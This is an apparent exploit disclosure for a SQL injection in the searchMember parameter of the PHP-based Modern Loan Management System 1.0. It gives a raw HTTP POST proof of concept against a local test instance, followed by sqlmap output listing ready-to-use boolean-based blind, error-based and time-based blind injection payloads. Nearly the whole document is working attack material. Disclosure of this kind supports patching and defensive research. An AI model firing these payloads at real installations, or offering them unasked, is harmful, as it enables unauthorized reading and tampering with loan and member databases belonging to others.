Exploit Title: SQL injection in Modern Loan management system 1.0
Date: 09/21/2024
Vendor Homepage: https://www.sourcecodester.com/users/mayurik
Software Link: https://www.sourcecodester.com/php/14570/modern-loan-management-system-project-phpmysql-full-source-code.html
Version: 1.0
Description: The searchMember in search_member.php of the Modern Loan Management System developed by mayuri_k is vulnerable to SQL injection.
Tested on: Windows10 + apache + MySQL + PHP5.4.45
POC:
POST /CVE/admin/index.php?page=search_member HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=lp2f9spshgfvq15min3jn6fr23
Content-Length: 79
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Host: 127.0.0.1
Connection: Keep-alive
searchMember=1*&sub=Search%20Member
sqlmap identified the following injection point(s) with a total of 259 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: searchMember=1' AND 6653=6653 AND 'MRlN'='MRlN&sub=Search Member
Type: error-based
Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: searchMember=1' AND ROW(7902,9590)>(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT (ELT(7902=7902,1))),0x716b766271,FLOOR(RAND(0)*2))x FROM (SELECT 9320 UNION SELECT 3819 UNION SELECT 9777 UNION SELECT 6003)a GROUP BY x) AND 'AOku'='AOku&sub=Search Member
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: searchMember=1' AND (SELECT 3824 FROM (SELECT(SLEEP(5)))mqcw) AND 'QBJY'='QBJY&sub=Search Member
---